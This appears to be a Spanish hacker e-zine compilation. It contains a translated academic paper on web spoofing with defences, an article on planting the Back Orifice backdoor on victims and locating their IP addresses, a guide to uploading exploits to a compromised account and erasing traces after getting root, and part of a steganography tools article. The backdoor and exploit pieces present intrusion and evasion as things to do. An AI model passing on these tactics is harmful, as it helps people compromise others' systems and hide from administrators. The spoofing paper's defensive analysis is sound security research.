Incluso la decision de aceptar la exactitud de informacion desplegada por
tu ordenador puede tener relacion con la seguridad. Por ejemplo, si decides
comprar una accion basada en informacion que recibes de un teletipo de
acciones online, confias en que la informacion que proporciona el teletipo sea
correcta. Si alguien pudiera presentarte precios de acciones incorrectos,
podrian hacerte embarcar en una transaccion que de otro modo no hubieras
hecho, y esto te podria costar dinero.
Contexto
--------
Un navegador presenta muchos tipos de contexto de los que el usuario
podria fiarse para tomar decisiones. El texto y los graficos de una pagina
Web podrian dar una impresion sobre la procedencia de la pagina; por
ejemplo, la presencia de un logo corporativo implica que la pagina se creo en
una cierta corporacion.
La apariencia de un objeto podria sugerir una cierta impresion; por ejemplo,
texto de color verde neon sobre un fondo morado probablemente venga de la
revista Wired. Podrias pensar que estas tratando con una ventana contextual
cuando lo que realmente estas viendo es simplemente un rectangulo con un
borde y colores diferentes que las zonas de alrededor de la panatalla. Objetos
graficos particulares como las file-open dialog boxes son immediatamente
reconocidas como que tienen que tener un proposito. Los usuarios de
Web experimentados reaccionan a dichas indicaciones de la misma forma
que los conductores experimentados reaccionan a las se¤ales de stop sin
necesidad de leerlas.
Los nombres de los objetos pueden sugerir contextos. La gente a menudo
deduce lo que hay en un archivo por su nombre. Es manual.doc el texto de un
manual de usuario? (Podria ser otra clase de documento, o podria no ser ni
siquiera un documento.) Las URLs son otro ejemplo. Es MICR0S0FT.COM la
direccion de una gran empresa de software? (Por un momento esa
direccion apuntaba completamente a otro. Por cierto, los simbolos
redondos de MICR0S0FT aqui son el
numero cero, no la letra O.) Era dole96.org la campa¤a presidencial de
1996 de Bob Dole? (No lo era, apuntaba a un site de parodia).
La gente a menudo toma el contexto segun la fecha de los hechos. Si ocurren
dos cosas al mismo tiempo, naturalmente piensas que estan relacionadas. Si
haces click hacia la pagina de tu banco y aparece un cuadro de dialogo
solicitando un nombre de usuario/password, naturalmente asumiras que debes
teclear el nombre y password que usas para el banco. Si haces click en
un link y comienza a bajarse immediatamente un documento, asumes que el
documento venia del site cuyo link clickeaste. Cualquier suposicion podria
ser incorrecta.
Si solo ves una ventana del navegador cuando ocurre un evento, podrias no
darte cuenta de que el evento fue creado por otra ventana escondida detras de
la que es visible.
Los dise¤adores de entornos de usuario modernos emplean su tiempo
intentando concebir indicaciones contextuales que hagan que la gente actue
apropiadamente, incluso si no advierten explicitamente las indicaciones.
Mientras esto es siempre beneficioso, puede hacerse peligroso cuando la
gente esta acostumbrada a fiarse del contexto que no siempre es correcto.
TCP y DNS Spoofing
------------------
Otra clase de ataque spoofing, que no discutiremos aqui, enga¤a al software
del usuario en una accion inapropiada presentandole informacion enaga¤osa
[3]. Ejemplos de dichos ataques incluyen el TCP spoofing [4], en el que los
paquetes de Internet son enviados con direcciones de vuelta falseadas, y el
DNS spoofing [5], en el que el atacante falsea informacion acerca de que
nombres de maquina corresponden a que direcciones de red. Estos otros
ataques spoofing son bien conocidos, asi que no los discutiremos mas en
detalle.
Web Spoofing
------------
El Web spoofing es un tipo de estafa electronica en la que el atacante
crea una convincente pero falsa copia de toda la World Wide Web. La Web
falsa es como la real: tiene todas las mismas paginas y links. Sin embargo,
el atacante controla la falsa Web, de manera que todo el trafico de red
entre el navegador de la victima y la Web pasa por el atacante.
Consecuencias
-------------
Ya que el atacante puede observar o modificar cualquier dato que vaya de
la victima a los servidores Web, como tambien controlar todo el trafico
de vuelta de los servidores Web a la victima, el atacante tiene muchas
posibilidades. Estas incluyen la vigilancia y el ama¤o de datos.
Vigilancia: El atacante puede observar pasivamente el trafico, anotando
que paginas visita la victima y los contenidos de las mismas. Cuando la
victima rellena un formulario, los datos introducidos son enviados a un
servidor Web, de manera que el atacante puede anotar eso tambien, junto con la
respuesta enviada por el servidor. Ya que la mayoria del comercio on-line se
realiza por medio de formularios, esto significa que el atacante puede
observar cualquier numero de cuenta o passwords que la victima meta.
Como veremos abajo, el atacante puede llevar a cabo la vigilancia incluso
si la victima tiene una conexion "segura" (normalmente por medio de Secure
Sockets Layer) al servidor, esto es, incluso si el navegador de la
victima muestra el icono de conexion segura (normalmente una imagen de un
candado o una llave).
Ama¤o: El atacante es tambien libre de modificar cualquiera de los
datos que viajen en cualquiera de las direcciones entre la victima y el
Web. El atacante puede modificar datos del formulario enviado por la
victima. Por ejemplo, si la victima esta pidiendo un producto on-line, el
atacante puede cambiar el numero del producto, la cantidad, o la direccion
a que debe ser enviado.
El atacante puede tambien modificar los datos devueltos por un servidor
Web, por ejemplo insertando material enga¤oso u ofensivo para enga¤ar a la
victima o para crear hostilidad entre la victima y el servidor.
Spoofing de toda la Red
-----------------------
Puedes pensar que es muy dificil para el atacante el trucar toda la World
Wide Web, pero no lo es. El atacante no necesita guardar todo el contenido
de la Red. Toda la Web esta disponible on-line; el servidor del atacante
puede simplemente traer una pagina de la Web real cuando necesita
proporcionar una copia de la pagina a la Web falsa.
Como Funciona el Ataque
-----------------------
La clave de este ataque es que el servidor Web del atacante se siente
entre la victima y el resto de la Red. Este tipo de procedimiento se
llama "ataque de hombre en medio" en la literatura de seguridad.
Renombramiento de URL
---------------------
El primer truco del atacante consiste en reescribir todas las URLs de
alguna pagina Web de manera que apunten al servidor del atacante en
vez de hacia aquellos servidores reales.
Asumiendo que el servidor del atacante este en la maquina
www.attacker.org, el atacante reescribe una URL a¤adiendo
http://www.attacker.org delante de la URL.
Por ejemplo,
http://home.netscape.com
se convierte en:
http://www.attacker.org/http://home.netscape.com
(La tecnica de renombramiento de URL ha sido usada para otras razones
por otros dos Web sites, the Anonymizer y the Zippy filter. Mira la ultima
pagina para detalles.)
La ilustracion 1 muestra lo que ocurre cuando la victima pide una pagina a
traves de una de las URLs renombradas. El navegador de la victima pide la
pagina desde www.attacker.org , ya que la URL comienza con http://
www.attacker.org. La notificacion de la URL le dice al servidor del
atacante a que lugar de la Red ir para coger el documento verdadero.
Una vez que el servidor del atacante ha pillado el documento real necesario
para satisfacer el pedido, el atacante reescribe todas las URLs del
documento del mismo modo especial empalmando http://www.atacker.org/ delante.
Entonces el server del atacante le da la pagina reescrita al navegador de
la victima.
Ya que todas las URLs de la pagina reescrita apuntan ahora a
www.attacker.org , si la victima sigue un link de la nueva pagina, la
pagina sera de nuevo pillada a traves del servidor del atacante. La victima
continua atrapada en la Web falsa del atacante, y puede seguir links por
siempre sin abandonarla.
Formularios
-----------
Si la victima rellena un formulario de una pagina de la Web falsa, el
resultado parece que haber sido bien manejado. El spoofing de formularios
funciona naturalmente ya que los formularios estan estrechamente
integrados en los protocolos de Web basicos: los envios de formularios
estan codificados en URLs y las respuestas son HTML ordinario. Ya que
cualquier URL puede ser "spoofeada", los formularios tambien.
Cuando la victima envia un formulario, los datos enviados van al servidor
del atacante. El servidor del atacante puede observar e incluso modificar
los datos enviados, haciendo cualquier edicion maligna que se desee, antes de
pasarlo al servidor real. El servidor del atacante puede tambien modificar
los datos que vuelven como respuesta a el formulario enviado.
Las conexiones "Seguras" no ayudan
----------------------------------
Una angustiosa propiedad de este ataque es que funciona incluso cuando
la victima pide una pagina por medio de una conexion "segura". Si la
victima hace un acceso de Web "seguro" (un acceso Web usando el Secure
Sockets Layer) en una Web falsa, todo parecera normal: la pagina sera
mostrada, y el indicador de conexion segura (normalmente una imagen de
una candado o llave) se encendera.
El navegador de la victima reporta que tiene una conexion segura
por que la tiene.
Desafortunadamente la conexion segura es a www.attacker.org y no al sitio que
la victima piensa.
El navegador de la victima piensa que todo va bien: se le dijo que
accediese a una URL en www.attacker.org asi que hizo una conexion segura
a www.attacker.org. El indicador de conexion segura solo da una sensacion
falsa de seguridad a la victima.
Comenzando el Ataque
--------------------
Para empezar un ataque, el atacante debe de algun modo atraer a la victima
a la Web falsa del atacante. Hay varios modos de hacer esto. Un atacante
podria poner un link a una Web falsa en una pagina Web popular. Si la
victima tiene el mail del navegador activado, el atacante puede mandar un
mail a la victima con un indicador a la Web falsa, o incluso los
contenidos de una pagina en una Web falsa. Finalmente, el atacante puede
enga¤ar a un motor de busqueda Web para que indexe parte de la Web falsa.
Completando la Ilusion
----------------------
El ataque como se ha descrito hasta aqui es bastante facil, pero no es
perfecto. Hay todavia algun contexto permanente que puede dar a la victima
pistas de que el ataque se esta llevando a cabo. Sin embargo, es posible
para el atacante el eliminar practicamente todas las pistas restantes de
la existencia del ataque.
Dicha evidencia no es muy dificil de eliminar por que los navegadores son
muy manejables. La habilidad de una pagina Web para controlar el
comportamiento de un navegador es a menudo deseable, pero cuando la
pagina es hostil puede ser peligroso.
La Barra de Estado
------------------
La barra de estado es una sola linea de texto situada debajo de la
ventana del navegador que muestra varios mensajes, normalmente sobre el estado
de transferencias Web pendientes.
El ataque como se ha descrito hasta aqui, deja dos tipos de evidencia en la
barra de estado. El primero, cuando el raton se situa sobre un link, la
barra de estado muestra la URL a la que el link apunta. Asi, la victima
podria darse cuenta de que una URL ha sido reescrita. Segundo, cuando una
pagina se esta cargando, la barra de estado muestra brevemente el nombre del
servidor
que se esta contactando. Asi, la victima podria notar que se esta
mostrando www.attacker.org cuando en realidad se esperaba otro nombre.
El atacante puede cubrir ambas indicaciones a¤adiendo un programa
JavaScript a cada una de las paginas reescritas. Ya que los programas
JavaScript pueden escribir en la barra de estado, y ya que es posible
vincular acciones JavaScript a los eventos relevantes, el atacante puede
arreglar las cosas de modo que la barra de estado participe en la estafa,
mostrando siempre a la victima lo que debia haber aparecido en la barra de
estado en la Web real. Asi el falseado contexto se hace incluso mas
convincente.
La Linea de Localizacion
------------------------
La linea de localizacion del navegador muestra la URL de la pagina que
esta mostrando en ese momento. La victima puede tambier teclear la URL en
la linea de localizacion, enviando al navegador a esa URL. El ataque
como se ha descrito hasta aqui hace aparecer una URL reescrita en la linea
de localizacion, dando a la victima una posible indicacion de que se esta
cometiendo un ataque.
Esta pista puede ser ocultada usando JavaScript. Un programa JavaScript
puede ocultar la linea de localizacion real y reemplazarla por una linea de
localizacion falsa que parece correcta y se encuentra en el lugar esperado.
La linea de localizacion falsa puede mostrar la URL que la victima
espera ver. La linea de localizacion falsa puede tambien aceptar entradas
de teclado, permitiendo a la victima teclear URLs normalmente. Las URLs
tecleadas pueden ser reescritas por el programa JavaScript antes de que se
acedan a ellas.
Viendo el Codigo Fuente del Documento
-------------------------------------
Hay una pista que el atacante no puede eliminar, pero es poco probable que sea
notada.
Usando la opcion de "ver codigo" del navegador, la victima puede mirar el
codigo HTML de la pagina actualmente mostrada. Buscando URLs reescritas en
el codigo HTML, la victima puede detectar el ataque. Desafortunadamente,
el codigo HTML es dificil de leer para usuarios novatos, y muy pocos
navegantes se molestan en mirar el codigo HTML de los documentos que estan
visitando, asi que esto provee muy poca proteccion.
Una pista parecida esta disponible si la victima elige la opcion "ver
informacion del documento" del navegador. Esto mostrara informacion incluyendo
la URL real del documento, permitiendo posiblemente a la victima darse
cuenta del ataque. Como arriba, esta opcion no se usa casi nunca asi que es
muy poco probable que proporcione mucha proteccion.
Bookmarks
---------
Hay varias formas de que la victima pueda dejar accidentalmente la Web falsa
del atacante durante el ataque. Accediendo a las bookmarks o saltando a una
URL usando la opcion "Abrir localizacion" del navegador podria llevar a la
victima de vuelta a la Web real. La victima podria entonces volver a entrar
a la Web falsa pulsando el boton "Back". Podemos imaginar que la victima
podria ir entrando y saliendo de una o mas Webs falsas. Por supuesto, las
bookmarks pueden tambien funcionar contra la victima, ya que es posible el
a¤adir un bookmark de una pagina de la Web falsa. El saltar a dicha bookmark
llevaria a la victima de vuelta a la Web falsa.
Traceando al Atacante
---------------------
Algunas personas han sugerido que este ataque puede ser disuadido
encontrando y castigando al atacante. Es cierto que el servidor del
atacante debe revelar su localizacion de modo que pueda llevar a cabo el
ataque, y la evidencia de esa localizacion estara disponible practicamente
seguro despues de que se detecte un ataque.
Desafortunadamente, esto no ayudara mucho en la practica ya que los
atacantes irrumpiran en la maquina de alguna persona inocente y lanzaran el
ataque alli. Se usaran maquinas robadas en estos ataques por la misma
razon que la mayoria de los ladrones de banco realizan sus huidas en coches
robados.
Remedios
--------
El Web spoofing es un ataque de seguridad peligroso y practicamente
indetectable que se puede llevar a cabo en la Internet de hoy en dia.
Afortunadamente hay algunas medidas de proteccion que puedes tomar.
Solucion a Corto-plazo
----------------------
A corto plazo, la mejor defensa es el seguir una estrategia de tres partes:
1. deshabilita la opcion de JavaScript en tu navegador de modo que el
atacante no podra ocultar la evidencia del ataque;
2. asegurate de que la linea de localizacion de tu navegador este siempre
visible;
3. presta atencion a las URLs mostradas en la linea de localizacion de tu
navegador, asegurandote de que siempre apunten al servidor al que piensas que
estas conectado.
Esta estrategia disminuira significativamente el riesgo de ataque, aunque
podrias aun ser victima si no eres consciente de mirar la linea de
localizacion.
Actualmente, JavaScript, ActiveX y Java tienden a facilitar el spoofing
y otros ataques de seguridad, asi que recomendamos que los deshabiliteis.
Haciendolo causara que pierdas cierta funcionalidad, pero puedes compensar
mucha de esta perdida habilitando selectivamente estas caracteristicas
cuando visites un site de confianza que los requiera.
Solucion a Largo-plazo
----------------------
No conocemos una solucion a largo-plazo totalmente satisfactoria para este
problema.
El cambiar los navegadores de modo que muestren siempre la linea de
localizacion ayudaria, aunque los usuarios aun tendrian que estar atentos y
saber como reconocer URLs reescritas.
Para las paginas que no son traidas via conexion segura, no hay mucho mas que
se pueda hacer.
Para las paginas traidas via conexion segura, un indicador de conexion-
segura mejorado podria ayudar. En vez de indicar simplemente una conexion
segura, los navegadores deberian decir claramente quien esta al otro
lado de la conexion. Esta informacion deberia ser mostrada con un lenguaje
claro, de forma entendible para los usuarios novatos; deberia decir algo
como "Microsoft Inc." en vez de "www.microsoft.com".
Todo acercamiento a este problema parece depender de la vigilancia de los
usuarios de Web. Aunque podamos realmente esperar que todo el mundo este
atento es siempre discutible.
Trabajos Relacionados
---------------------
Nosotros no inventamos la tecnica de reescritura de URL. Previamente, la
reescritura de URL ha sido usada como una tecnica para proporcionar servicios
utiles a gente que los ha pedido.
Sabemos de la existencia de dos servicios que usan la reescritura de URL. El
Anonymizer, escrito por Justin Boyan en Carnegie Mellon University, es un
servicio que permite a los usuarios el navegar por la Red sin revelar sus
identidades a los sites que visitan. The Zippy filter, escrito por Henry
Minsky, presenta una vision divertida de la Red con dichos de Zippy-
the-Pinhead insertados aleatoriamente.
Aunque nosotros no inventamos la reescritura de URL, creemos que somos los
primeros en darnos cuenta de su total potencial como un componete de un ataque
de seguridad.
Agradecimientos
---------------
La parte de reescritura de URL de nuestro programa de demostracion esta
basada en el codigo de Henry Minsky para el Zippy filter. Agradecemos a
David Hopwood sus utiles comentarios sobre ataques spoofing, y a Gary
McGraw y Laura Felten sus comentarios sobre el borrador de este
documento.
Para Mas Informacion
--------------------
Mas informacion disponible en nuestra pagina web en:
http://www.cs.princeton.edu/sip , o del
Profesor Edward Felten en felten@cs.princeton.edu o en el (609) 258-5906
Referencias
-----------
[1] Peter G. Neumann. Computer-Related Risks. ACM Press, New York, 1995.
[2] Gary McGraw and Edward W. Felten. Java Security: Hostile Applets, Holes
and Antidotes. John Wiley and Sons, New York, 1996.
[3] Robert T. Morris. A Weakness in the 4.2BSD UNIX TCP/IP Software. Computing
Science Technical Report 117, AT&T Bell Laboratories, February 1985.
[4] Steven M. Bellovin. Security Problems in the TCP/IP Protocol Suite.
Computer Communications Review 19(2):32-48, April 1989.
[5] Steven M. Bellovin. Using the Domain Name System for System Break-ins.
Proceedings of Fifth Usenix UNIX Security Symposium, June 1995.
[6] Web site at http://www.anonymizer.com
[7] Web site at http://www.metahtml.com/apps/zippy/welcome.html
Traduccion
----------
Traducido por [Tosh]
BBK "Big Bro Killerz"
bigbrokill@hotmail.com
http://www.geocities.com/SiliconValley/Pines/7347/
-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|
ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
³ ³
³ PELIGRO EN WINDOWS ³
³ Original de Yo Soy para RareGaZz ³
³ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ³
ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļ
Al parecer el uso de ciertas utilidades para tener acceso sobre plataformas
windows, estan creciendo, tan solo unos ejemplos son: el hacer Spoofing
a usuarios de ICQ o conectarse remotamente con aplicaciones que actuan como
"backdoors" permitiendo asi la entrada a personas desconocidas al sistema.
Un ejemplo de estas "backdoors" es el famoso programa - Back Orifice - ,
este ultimo del grupo cDc (Cult of Dead Cow). El usuario fisico ejecuta el
programa que funciona como "servidor" para el programa "cliente". La persona
que tiene el programa cliente tiene dominio sobre el sistema, pudiendo hacer
por ejemplo: Ejecutar aplicaciones, abrir un puerto para entrar via http,
subir y bajar archivos, asi como eliminalos y modicarlos, ver lo que escribe
el usuario en la pc remota, ver su pantalla, abrir la unidad de cd-rom, solo
por decir algunas cuantas...
De echo, la persona que ejecuta el programa "servidor", ni cuenta se da de
que ha dejado su sistema a merced del "intruso"; quien, si es malicioso
intentara joder el sistema de alguna manera. El programa se auto-copia a
otra locacion dentro del mismo disco duro , modifica el registro del sistema
de manera que cada vez que se inicie windows se auto-ejecute, impidiendo asi
que el usuario lo note facilmente.
TU MISMO puedes estar bajo estas influencias ahora mismo y ni siquiera lo
sabes....
Las posibilidades son infinitas ( te imaginas mandar el backdoor a un admin
que utilice NT, jaja, tendremos control sobre las cuentas y todo el sistema).
Microsoft fue notificado, podemos ver unos cuantos bytes sobre el tema en:
http://www.microsoft.com/security/bulletins/ms98-010.htm
E ISS's no se queda atras:
http://www.iss.net/xforce/alerts/advise5.html
__ UTILIZANDO LAS BACKDOORS...
Pues esto esta muy facil, tienen que empaquetar el programa "server" del
programa en cuestion (patch.exe o boserver.exe ) y enviarlo a la "victima"
quien lo ejecutara y asi te podras conectar tu... (no tiene mucho chiste...)
Por cierto el BO hay una version para Unix/Linux.
- Desventajas:
__ Ya lo hice, pero como me conecto si no tengo su IP ?
Pues la principal desventaja es que tienes que investigar la ip del
usuario victima para poder hacer la conexion, esto no es muy dificil si
estamos via IRC con el comando /dns nick_victima y con ICQ utilizando la
opcion info, o si esta escondida, utilizando el ICQ Spoofer ;)
[Disponible ya en la web de RareGaZz]
__ Ya lo hice, pero no tiene ICQ y no esta via irc...
En caso de que se trate de algun Admin de un server, pues prueba con su
dominio y en la mayoria de los casos funciona.
__ Nope, se trata de un amigo al que le quiero jugar una broma..
Ups!, si se trata de un usuario con I.P dinamica, pues ya valiste..
Tendras que ingeniartelas para obtener su I.P...(de esta forma no estas
de lamercillo destruyendo sistemas..)
__ Oh! Diablos!! Ejecute boserve.exe en mi maquina!!!..
Jajaja!!! que cosa :P, bueno no todo esta acabado, existe un programa
llamado B.O.R.E.D. (Back Orifice Recognition, Extraction and Deletion)
que se encarga de protegerte del uso de Back Orifice (huy... que miedo :)
[ Proximamente en la web de RareGaZz ]
<->
Saludos a: #RaZa-MeXiCaNa Red Latina, dR-SeuSs, Megaflop, xDAWN, GuyBrush,
Acidgum, He|io, PlaXiuS, SufferBoy, y los demas... :)
<=Yo-Soy=> varf@bigfoot.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
³ ³
³ INTRODUCIENDO TUS EXPLOITS ³
³ por Yo Soy (varf@bigfoot.com) ³
³ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ³
ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļ
Digamos que tienes una cuenta en un sistema y que vas a hacer unas cuantas
cosas divertidas ;) ... Bueno , conseguimos unos exploits en nuestro lugar
preferido ( Bugtraq, Rootshell o RareGaZz :D , etc ) y Ohh que diablos !
Como los introduzco ?
Bueno, aqui podemos hacer varias cosas:
a) Usar el FTP para subirlos al home de la cuenta (algo sospechoso)
b) Mandarlos via e-mail (menos sospechoso)
c) Escribirlos directamente en la shell (menos sospechoso y mas tardado)
A) FTP
Muy simple, utilizando el comando ftp o con un cliente ftp
nos conectamos al host que queremos, subimos los archivos y ya..
( no es muy recomendable, pues deja logs, si el admin se pone a ver
se dara cuenta que un hacker le andaba por ahi, sobre todo si tus
exploits fallan... )
B) E-MAIL
Esta forma seria menos sospechosa, pues los usuarios utilizan el
correo en forma normal y no se notaria el asunto de nuestros
programillas, seria casi indetectable, pero puede tener el
inconveniente de ser tardado, dependiendo de la distancia entre
tu y el host...
C) ESCRIBIENDOLOS
Aqui utilizariamos un editor y estariamos como weyes escribiendo
letra por letra todo el fucking exploit, pero hay una forma mas
facil que es utilizando el comando cat e ir pegando el exploit
a la terminal.
Ejemplo:
varf:~:$ cat > mundo.c << STOP
#include <stdio.h>
main()
{
printf("Hola mundo! :P\n"):
}
STOP
varf:~:$
varf:~:$ cat mundo.c
main()
{
printf("Hola mundo! :P\n"):
}
varf:~:$
varf:~:$ cc -o mundo mundo.c
varf:~:$ mundo
Hola mundo! :P
varf:~:$
Aqui utilizamos "cat > nombre.c << STOP" para meter los archivos desde
la terminal, pudiendo cortar el contenido desde otro editor y despues
pegarlo en la terminal, despues cuando escribimos STOP se detiene la
forma de introducir infromacion y se salva el archivo. Despues usamos
cat de nuevo para ver como quedo el archivo, y vemos que la palabra
STOP no se quedo en el contenido del archivo, despues compilamos con
cc y ya... facil :)
Recuerda siempre borrar los exploits (funcionen o no), y si consigues
root eliminar las pocas huellas que hay para que el admin no se ponga
sospechoso... Disfruten...
<=> Original en CRH #2
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»º
ººÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»ºº
ººº ESTEGANOGRAFIA O EL ARTE DE ESCONDER LOS DATOS ººº
ººº por PaTa ººº
ººÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼºº
ºÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
¨Que es la esteganografia? te preguntaras, bueno pues es un conjunto
de tecnicas que nos permiten ocultar cualquier tipo de datos.
La diferencia entre esteganogarfia y criptografia, es muy simple
mientras que la criptografia modifica los datos para que no sean legibles, de
todos es sabido la forma de
trabajar del pgp, la esteganografia simplemente
los oculta, aunque hoy en dia ambas tecnicas son facilmente compatibles con el
uso de los ordenadores actuales.
Esta tecnica no es nada nueva, data de bastante tiempo, por ejemplo en
la segunda guerra mundial los aliados usaban esta tecnica para comunicarse
con la resistencia alemana por medio de cartas.
La innovacion en esta tecnica se ha dado gracias a la llegada de la
informatica y los ordenadores, se ha pasado de por ejemplo escribir con tinta
invisible que solo se ve al acercar una fuente de calor, cosa que todos hemos
visto en las peliculas de espias, a modificar archivos de audio o graficos
para que estos contengan a su vez otros archivos.
La esteganografia nos puede servir para comunicarnos sin que la gente
se de cuenta ya que por ejemplo si usas el pgp la gente piensas que ocultas
algo, cosa que a mi me sucede yo tengo un amigo, al que le digo que use el pgp
para comunicarse conmigo y el me dice que no tiene nada ilegal que decirme,
espero que al leer esto cambies de idea :o) bueno como dice Phil Zimmerman
autor del pgp "Si se convierte la privacidad en algo ilegal, solo los ilegales
tendran privacidad".
El medio ideal para usar la estaganografia es aquel en donde se suelen
realizar escaneos automatizados de mensajes, o donde puede ser sospechoso usar
otros medio de encriptacion criptografica, por ejemplo si en el trabajo usas
continuamente pgp pueden que alli alguien se empice a mosquear, o si la
paranolla invade tu vida :o) para esos momentos nada mejor que la
esteganografia.
Aunque claro segun donde estemos no podemos dar un salto radical a la
esteganografia, si estamos trabajando, y usamos continuamente pgp, y cambiamos
de la noche al dia a la esteganografia, podemos levantar sospechas, para eso
es mejor una preparacion del entorno, en ese caso deberiamos empezar
a interesarnos por las matematicas del caos y fractales, y despues de un
tiempo empezar a intercambiar fractales con nuestro anterior comunicante del
pgp.
Por lo que todo el mundo debe tener precauciones en sus mensajes por
mail si no ya se esta viendo lo que le esta pasando a Bill Gates, y sus mail a
sus subordinados, en el juicio anti-monopolio en E.E.U.U.
El correo electronico poco a poco va sustituyendo al normal, en todos
los aspectos pues de todos es conocida su aplastante superioridad sera la
norma para todo el mundo, no la novedad que es hoy en dia.
Los gobiernos no solo el norteamericano tambien recientemente el
espa¤ol con su articulo 52 pretenden proteger nuestro correo electronico con
sistemas de encriptacion dise¤ados por ellos. Probablemente la mayor parte
de la gente aceptara eso. Pero quizas algunos prefiraos utilizar otras medidas
propias, si o recordemos el DES vencido en tres horas y con un ordenador
de tan solo cuarenta millones de pesetas.
Las agencias de inteligencia tienen acceso a buenos sistemas de
criptografia, tambien los grandes traficantes de armas y drogas. Igualmente
los fabricantes, las multinacionales y otros gigantes corporativos. Pero la
gente normal y corriente, las organizaciones de andar por casa, no tienen
acceso a tecnologia ,pero se puede resolver con otro tipo de tecnicas, como la
esteganografia.
Ahora voy a poner algunos programas y su uso mas basico:
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º TEXTO º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Texto, que a pesar de su nombre no es un programa espa¤ol, ha sido
escrito por Kevin Maher, y es un programa que transforma archivos codificados
con uuencode o archivos encriptados con PGP con ASCII armor en archivos de
texto que contienen frases en ingles.
Los textos producidos por Texto son, ante todo, extra¤os. Los
aficionados al surrealismo disfrutaran con este programa.
Aqui teneis un peque¤o ejemplo:
The printer weakly leans to the cold planet. I outwit bright units near the
new cosmetic barn. Sometimes, hats count behind cold windows, unless they're
cosmetic. Never count strangely while you're riping through a cold car. We
easily love around secret clear monoliths. While pins really learn, the cats
often eat on the ajar hens. Other usable strange games will darken fully with
forks. Going below a corner with a brush is often tall. Have a filthy pool.
The cosmetic floor rarely dreams. Tell the clear book it's fully tooting
against a dust. Many clear powerful eggs will smile slowly to pools. To be
dense or dense will cause sly pins to float. Will you question the quiet cold
codes? Let's connect near the obtuse cafes, but don't write the filthy papers.
Texto sustituye los caracteres ASCII por palabras en ingles que
obtiene de un archivo llamado words. Despues utiliza estas palabras segun las
estructuras de frases contenidas en un archivo llamado structs, creando asi
el texto en ingles.
El gran problema que tiene este programa: el texto obtenido es DIEZ
VECES mayor que el archivo original.
Otros dos inconvenientes, de mucho menor importancia tienen que ver
con el uso de archivos codificados con uuencode: el primero es que se pierde
la informacion sobre el nombre y el modo de acceso del archivo original; el
segundo es que el texto producido puede llegar a ser demasiado repetitivo.
Ejemplos
texto archivo_encriptado > archivo_de_texto
Transforma el contenido de archivo_encriptado (un archivo PGP con ASCII armor
o un archivo codificado con uuencode) en texto en ingles.
texto -p archivo_de_texto > archivo_PGP
Convierte el texto en ingles de archivo_de_texto en un archivo PGP con ASCII
armor.
texto -u archivo_de_texto > archivo_uuencode
Lo mismo que el anterior ejemplo, pero con uuencode.
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º MANDELSTEG º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
El programa Mandelsteg ha sido escrito por Henry Hastur y puede
distribuirse gratuitamente. Esta en realidad formado por dos programas:
mandelsteg, que genera archivos gif de fractales de Mandelbrot en los que
